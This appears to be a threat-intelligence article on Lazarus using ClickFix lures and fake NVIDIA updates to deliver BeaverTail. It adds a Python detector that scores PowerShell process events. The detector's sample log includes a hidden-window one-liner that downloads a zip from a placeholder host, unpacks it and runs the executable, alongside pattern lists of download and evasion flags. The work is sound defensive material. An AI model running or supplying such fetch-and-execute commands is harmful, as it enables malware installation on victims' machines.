Lazarus APT Hackers Employ ClickFix Technique to Exfiltrate Sensitive Intelligence Data
The notorious Lazarus APT group has adapted its attack strategy by adopting the increasingly prevalent ClickFix social engineering technique to distribute malware and extract sensitive intelligence data from targeted organisations. This North Korean-linked threat actor, designated APT-Q-1 by the researchers who track it, has shown considerable adaptability by merging deceptive user-interface manipulation with its traditional espionage operations. ClickFix is a social engineering method in which attackers fabricate a technical problem and guide the victim through a seemingly legitimate "fix" that in fact executes malicious code. Lazarus has weaponised this approach within its established fake-recruitment campaign infrastructure, producing a multi-layered attack vector that combines job-opportunity lures with technical deception.
Recent analysis by CN-SEC researchers uncovered this campaign through a malicious batch script that downloads disguised NVIDIA software packages, which in turn deploy the group's signature BeaverTail information stealer. The attack chain begins when victims are lured to fraudulent interview websites and prompted to prepare their interview environment, with the site claiming that a camera configuration issue must be resolved immediately. The operation's technical sophistication goes beyond basic social engineering. Victims are shown what appears to be a legitimate NVIDIA driver update command, but the command actually runs a malicious execution sequence. The primary infection vector is a PowerShell command that downloads and extracts a malicious ZIP archive from compromised infrastructure; the campaign targets both Windows and macOS, with payloads tailored to each operating system and architecture.
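The Windows delivery path described above (a user pasting a "driver update" command that makes PowerShell download, extract and run an archive) leaves a recognisable trace in process-creation telemetry. The following detection example is added here and is not code from the original article or from CN-SEC; it scores Sysmon Event ID 1-style records (the `Image`, `ParentImage` and `CommandLine` field names are real Sysmon fields, while the log lines, the weights, the threshold and the `placeholder.invalid` host are constructed assumptions) and flags a PowerShell launch that combines a remote download with an unpack/execute stage, or an encoded command run from an interactive parent such as `explorer.exe`, which is where a Win+R paste lands.

```python
"""Triage Sysmon-style process-creation events for ClickFix-style PowerShell one-liners.

Added detection example. Field names follow Sysmon Event ID 1 (Image, ParentImage,
CommandLine); the sample log lines, scoring weights and threshold are constructed
assumptions to be tuned against a real baseline.
"""
import base64
import json
import re
from typing import Dict, List

# Cmdlets, aliases and .NET calls that fetch remote content
DOWNLOAD_PATTERNS = [
    r"\bInvoke-WebRequest\b", r"\biwr\b", r"\bcurl\b", r"\bwget\b",
    r"\bStart-BitsTransfer\b", r"\.DownloadString\(", r"\.DownloadFile\(",
]
# Steps that unpack or run what was fetched
STAGE_PATTERNS = [
    r"\bExpand-Archive\b", r"\bInvoke-Expression\b", r"\biex\b",
    r"\bStart-Process\b", r"\bcmd(\.exe)?\s+/c\b",
]
# An encoded command hides the real script from casual inspection
ENCODED_PATTERN = r"-e(ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{20,}"
# Flags that hide the console window or bypass the execution policy
EVASION_PATTERNS = [
    r"-w(indowstyle)?\s+hidden", r"-nop\b", r"-noprofile\b",
    r"-ep\s+bypass", r"-executionpolicy\s+bypass",
]
# Parents typical of a user pasting into Win+R or a terminal (the ClickFix path),
# as opposed to a service or scheduler launching an approved script
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}
THRESHOLD = 3  # assumed value; tune against your own environment


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _hits(patterns: List[str], text: str) -> List[str]:
    return [p for p in patterns if re.search(p, text, re.IGNORECASE)]


def score_event(evt: Dict) -> Dict:
    """Return {"score": int, "reasons": [...]} for one process-creation event."""
    if _basename(evt.get("Image", "")) not in {"powershell.exe", "pwsh.exe"}:
        return {"score": 0, "reasons": []}
    cmd = evt.get("CommandLine", "")
    score, reasons = 0, []
    if _hits(DOWNLOAD_PATTERNS, cmd):
        score += 2
        reasons.append("remote download")
    if _hits(STAGE_PATTERNS, cmd):
        score += 2
        reasons.append("unpack/execute stage")
    if re.search(ENCODED_PATTERN, cmd, re.IGNORECASE):
        score += 2
        reasons.append("encoded command")
    if _hits(EVASION_PATTERNS, cmd):
        score += 1
        reasons.append("hidden window / policy bypass")
    if _basename(evt.get("ParentImage", "")) in INTERACTIVE_PARENTS:
        score += 1
        reasons.append("launched from interactive parent")
    return {"score": score, "reasons": reasons}


def triage(lines: List[str], threshold: int = THRESHOLD) -> List[Dict]:
    """Parse JSON log lines and return the events that reach the threshold, with reasons."""
    flagged = []
    for line in lines:
        evt = json.loads(line)
        result = score_event(evt)
        if result["score"] >= threshold:
            flagged.append({"ParentImage": _basename(evt.get("ParentImage", "")),
                            "CommandLine": evt.get("CommandLine", ""), **result})
    return flagged


# Constructed sample telemetry (not real IoCs): one ClickFix-style paste, two benign
# administrative launches, one encoded command from Explorer, one non-PowerShell process.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode("Write-Host demo".encode("utf-16le")).decode()  # harmless payload
SAMPLE_LOG = [
    json.dumps({"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r'powershell -w hidden -nop -c "iwr https://placeholder.invalid/nvidia_update.zip -OutFile $env:TEMP\u.zip; Expand-Archive $env:TEMP\u.zip $env:TEMP\u; Start-Process $env:TEMP\u\update.exe"'}),
    json.dumps({"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
                "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"}),
    json.dumps({"EventID": 1, "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
                "ParentImage": r"C:\Users\alice\AppData\Local\Microsoft\WindowsApps\WindowsTerminal.exe",
                "CommandLine": r"pwsh.exe -NoProfile -Command Get-ChildItem C:\Logs"}),
    json.dumps({"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": "powershell -enc " + ENCODED}),
    json.dumps({"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
                "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"}),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(f'[score {hit["score"]}] parent={hit["ParentImage"]} reasons={hit["reasons"]}')
        print("   ", hit["CommandLine"][:120])
```

Only the first and fourth constructed records cross the threshold: the download-plus-extract one-liner scores 6, and the encoded command launched from `explorer.exe` scores 3, while the scheduled script and the interactive `Get-ChildItem` stay below it because download, staging and encoding signals are absent. Treat the weights as a starting point; in a real deployment the parent-process signal should be joined with clipboard or Run-dialog telemetry where available, and the macOS variant of the campaign needs an equivalent rule over `zsh`/`bash` and `curl` process events.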
Categories: Cybersecurity Threats, Social Engineering Techniques, Malware Distribution Methods
Tags: Lazarus APT, ClickFix, Social Engineering, Malware, Espionage, Phishing, Cross-Platform, PowerShell, NVIDIA, Information Stealer